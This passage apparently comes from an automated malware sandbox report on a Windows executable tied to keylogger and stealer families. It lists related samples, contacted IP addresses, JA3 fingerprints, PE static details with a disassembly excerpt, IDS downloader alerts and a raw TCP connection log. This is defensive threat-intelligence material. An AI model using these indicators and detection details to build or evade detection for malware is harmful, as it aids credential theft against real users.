                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    SKB-ENTERPRISENLDoc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 5.182.211.149
                                                                                                                                    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 5.182.211.149
                                                                                                                                    bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 45.148.121.112
                                                                                                                                    bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 45.148.121.112
                                                                                                                                    i3LQkjkqOB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                    • 45.148.121.112
                                                                                                                                    grjD7lWffX.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                    • 45.148.121.112
                                                                                                                                    systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                                                                    • 45.148.120.142
                                                                                                                                    systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                                                                    • 45.148.120.142
                                                                                                                                    configs.confGet hashmaliciousUnknownBrowse
                                                                                                                                    • 45.148.120.142
                                                                                                                                    configs.confGet hashmaliciousUnknownBrowse
                                                                                                                                    • 45.148.120.142

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adVSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0esweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    PO_0001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                    • 149.154.167.220

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    No created / dropped files found

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.307112254057628
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    File size:207'872 bytes
                                                                                                                                    MD5:17fde190e651aee3335ed55eeaa1a6db
                                                                                                                                    SHA1:8bb498b5d6fc4a58043d9e51d80790083cecd1f7
                                                                                                                                    SHA256:a7e6101a68d513260f4e380b8d9bc66f90cee222d6ef157201884f6f32ce4cf3
                                                                                                                                    SHA512:f4df0edfe99784bddad1ae3f275afe1d3dbff0a2d75531de9771558e97f60621353dbd08f6369e7c41feb38fdf2760737a4ca5da68110cef44bd5320ec7ab97f
                                                                                                                                    SSDEEP:3072:UDKW1LgppLRHMY0TBfJvjcTp5X+5y76khunx2ZZg1sl7bYk:UDKW1Lgbdl0TBBvjc/+5yGkYnx+gKlbH
                                                                                                                                    TLSH:1714BE1075C1C1B3C4B7103044EACB7A9A3A7572076A96D7B7DC2BBA6F213D1A3362C9
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#........

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x40cd2f
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:5
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:5
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:5
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:bf5a4aa99e5b160f8521cadd6bfe73b8

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    call 00007FDDFCC06886h
                                                                                                                                    jmp 00007FDDFCC00A49h
                                                                                                                                    mov edi, edi
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    sub esp, 20h
                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                    push esi
                                                                                                                                    push edi
                                                                                                                                    push 00000008h
                                                                                                                                    pop ecx
                                                                                                                                    mov esi, 0041F058h
                                                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                                                    rep movsd
                                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                                                    pop edi
                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                    pop esi
                                                                                                                                    test eax, eax
                                                                                                                                    je 00007FDDFCC00BAEh
                                                                                                                                    test byte ptr [eax], 00000008h
                                                                                                                                    je 00007FDDFCC00BA9h
                                                                                                                                    mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                                                    push eax
                                                                                                                                    push dword ptr [ebp-10h]
                                                                                                                                    push dword ptr [ebp-1Ch]
                                                                                                                                    push dword ptr [ebp-20h]
                                                                                                                                    call dword ptr [0041B000h]
                                                                                                                                    leave
                                                                                                                                    retn 0008h
                                                                                                                                    ret
                                                                                                                                    mov eax, 00413563h
                                                                                                                                    mov dword ptr [004228E4h], eax
                                                                                                                                    mov dword ptr [004228E8h], 00412C4Ah
                                                                                                                                    mov dword ptr [004228ECh], 00412BFEh
                                                                                                                                    mov dword ptr [004228F0h], 00412C37h
                                                                                                                                    mov dword ptr [004228F4h], 00412BA0h
                                                                                                                                    mov dword ptr [004228F8h], eax
                                                                                                                                    mov dword ptr [004228FCh], 004134DBh
                                                                                                                                    mov dword ptr [00422900h], 00412BBCh
                                                                                                                                    mov dword ptr [00422904h], 00412B1Eh
                                                                                                                                    mov dword ptr [00422908h], 00412AABh
                                                                                                                                    ret
                                                                                                                                    mov edi, edi
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    call 00007FDDFCC00B3Bh
                                                                                                                                    call 00007FDDFCC073C0h
                                                                                                                                    cmp dword ptr [ebp+00h], 00000000h

                                                                                                                                    Rich Headers

                                                                                                                                    Programming Language:
                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                    • [LNK] VS2008 build 21022

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x215b40x50.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x10a78.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1b1c00x1c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x20da00x40.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x184.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x197180x19800cadcc8bee8523060769be8bde6055497False0.5789388020833334data6.74853538687006IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x1b0000x6db40x6e005826801f33fc1b607aa8e942aa92e9faFalse0.5467329545454546data6.442956247632331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x220000x30c00x16002fe51a72ede820cd7cf55a77ba59b1f4False0.3126775568181818data3.2625868398009703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .rsrc0x260000x10a780x10c00a1132eab1909b1f92211aecb70cd0d74False0.9645522388059702data7.97043080440538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_RCDATA0x261240xf9b9data1.0004067011841262
                                                                                                                                    RT_RCDATA0x35ae00x20data1.28125
                                                                                                                                    RT_VERSION0x35b000x31cdata0.4296482412060301
                                                                                                                                    RT_MANIFEST0x35e1c0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllRaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                                                                                                    ole32.dllOleInitialize
                                                                                                                                    OLEAUT32.dllSafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString

                                                                                                                                    Network Behavior

                                                                                                                                    Suricata IDS Alerts

                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-11-26T09:46:53.806454+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699132.226.8.16980TCP
                                                                                                                                    2024-11-26T09:46:56.759609+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699132.226.8.16980TCP
                                                                                                                                    2024-11-26T09:46:58.437508+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701104.21.67.152443TCP
                                                                                                                                    2024-11-26T09:47:00.103356+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702132.226.8.16980TCP
                                                                                                                                    2024-11-26T09:47:09.057527+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749718104.21.67.152443TCP
                                                                                                                                    2024-11-26T09:47:20.265217+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749754104.21.67.152443TCP
                                                                                                                                    2024-11-26T09:47:23.570571+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749761104.21.67.152443TCP

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 26, 2024 09:46:51.645282030 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:51.765324116 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:51.766978979 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:51.767282009 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:51.887208939 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:53.245064974 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:53.253727913 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:53.373857021 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:53.757086992 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:53.806453943 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:54.365866899 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:54.365915060 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:54.365972042 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:54.423255920 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:54.423297882 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:55.701797009 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:55.701900959 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:55.708316088 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:55.708332062 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:55.708595991 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:55.759635925 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:55.890168905 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:55.935329914 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.216687918 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.216753006 CET44349700104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.216805935 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:56.223876953 CET49700443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:56.230967999 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:56.351201057 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.717119932 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.720285892 CET49701443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:56.720331907 CET44349701104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.720400095 CET49701443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:56.720740080 CET49701443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:56.720755100 CET44349701104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:56.759608984 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:57.977415085 CET44349701104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:57.981453896 CET49701443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:57.981488943 CET44349701104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:58.437522888 CET44349701104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:58.437585115 CET44349701104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:58.437866926 CET49701443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:58.438390970 CET49701443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:46:58.442538023 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:58.443949938 CET4970280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:58.562779903 CET8049699132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:58.562849998 CET4969980192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:58.563909054 CET8049702132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:58.563997984 CET4970280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:58.564237118 CET4970280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:46:58.684492111 CET8049702132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:00.052484035 CET8049702132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:00.053796053 CET49703443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:00.053854942 CET44349703104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:00.053932905 CET49703443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:00.054244995 CET49703443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:00.054255962 CET44349703104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:00.103355885 CET4970280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:01.357717991 CET44349703104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:01.359906912 CET49703443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:01.359947920 CET44349703104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:01.822127104 CET44349703104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:01.822197914 CET44349703104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:01.822274923 CET49703443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:01.822959900 CET49703443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:01.827445984 CET4970580192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:01.947729111 CET8049705132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:01.947949886 CET4970580192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:01.948117971 CET4970580192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:02.068330050 CET8049705132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:03.407274008 CET8049705132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:03.408893108 CET49706443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:03.408966064 CET44349706104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:03.409040928 CET49706443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:03.409301043 CET49706443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:03.409312963 CET44349706104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:03.462759018 CET4970580192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:04.666615009 CET44349706104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:04.668730974 CET49706443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:04.668775082 CET44349706104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:05.122870922 CET44349706104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:05.122940063 CET44349706104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:05.123034954 CET49706443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:05.123739004 CET49706443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:05.127784014 CET4970580192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:05.129215002 CET4971280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:05.248172998 CET8049705132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:05.248437881 CET4970580192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:05.249217033 CET8049712132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:05.249310970 CET4971280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:05.249593973 CET4971280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:05.370486021 CET8049712132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:07.355262041 CET8049712132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:07.358310938 CET49718443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:07.358351946 CET44349718104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:07.358418941 CET49718443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:07.358855963 CET49718443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:07.358867884 CET44349718104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:07.400460005 CET4971280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:08.604712963 CET44349718104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:08.606673002 CET49718443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:08.606697083 CET44349718104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:09.057552099 CET44349718104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:09.057635069 CET44349718104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:09.057786942 CET49718443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:09.058307886 CET49718443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:09.070745945 CET4971280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:09.072094917 CET4972680192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:09.192250013 CET8049712132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:09.192270994 CET8049726132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:09.192447901 CET4971280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:09.192526102 CET4972680192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:09.192804098 CET4972680192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:09.314290047 CET8049726132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:11.751053095 CET8049726132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:11.752612114 CET49734443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:11.752655029 CET44349734104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:11.752851009 CET49734443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:11.753113985 CET49734443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:11.753123999 CET44349734104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:11.791261911 CET4972680192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:13.011146069 CET44349734104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:13.021207094 CET49734443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:13.021233082 CET44349734104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:13.465051889 CET44349734104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:13.465121984 CET44349734104.21.67.152192.168.2.7
